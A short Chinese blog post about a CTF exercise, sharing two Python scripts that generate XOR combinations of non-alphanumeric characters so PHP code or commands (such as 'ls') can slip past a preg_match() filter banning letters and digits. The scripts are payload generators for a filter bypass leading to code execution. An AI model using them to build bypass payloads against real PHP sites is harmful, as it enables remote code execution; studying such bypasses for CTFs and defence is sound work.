关于php异或的脚本

最近做了道使用异或绕过preg_match()的题,正则的要求是没有字母数字。

网上翻文章,搜集了两个脚本

#朋友给的,也不知道最早是哪个师傅写的
def encode(command):
    code = "~`!@#$%&*()-=+_[]{};:<>,.?/|"
    result_1 = ""
    result_2 = ""

    for x in command:
        if not command.isalpha():
            result_1 += x
            result_2 += x
        for y in code:
            if chr(ord(x) ^ ord(y)) in code:
                result_1 += y
                result_2 += chr(ord(x) ^ ord(y))
                break
    return f'("{result_1}" ^ "{result_2}")' 

a=encode('ls')
print(a)

第二个脚本会返回所有字母的异或组合,得自己手工找拼出命令,或者改造一下脚本也行。

#来源: 国光
#文章作者: 国光
#文章链接: https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
#咳咳又想白嫖文章?本文章著作权归作者所有,任何形式的转载都请注明出处。

import string 
from urllib.parse import quote 
keys = list(range(65)) + list(range(91,97)) + list(range(123,127)) 
results = [] 
for i in keys: 
    for j in keys: 
        asscii_number = i^j 
        if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122): 
            if i < 32 and j < 32: 
                temp = (f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number)) 
                results.append(temp) 
            elif i < 32 and j >=32: 
                temp = (f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number)) 
                results.append(temp) 
            elif i >= 32 and j < 32: 
                temp = (f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number)) 
                results.append(temp) 
            else: 
                temp = (f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number)) 
                results.append(temp) 

results.sort(key=lambda x:x[1], reverse=False) 
for low_case in string.ascii_lowercase: 
    for result in results: 
        if low_case in result: 
            print(result[0]) 
            
for upper_case in string.ascii_uppercase: 
    for result in results: 
        if upper_case in result: 
            print(result[0])

 

你可能感兴趣的:(ctf,信息安全)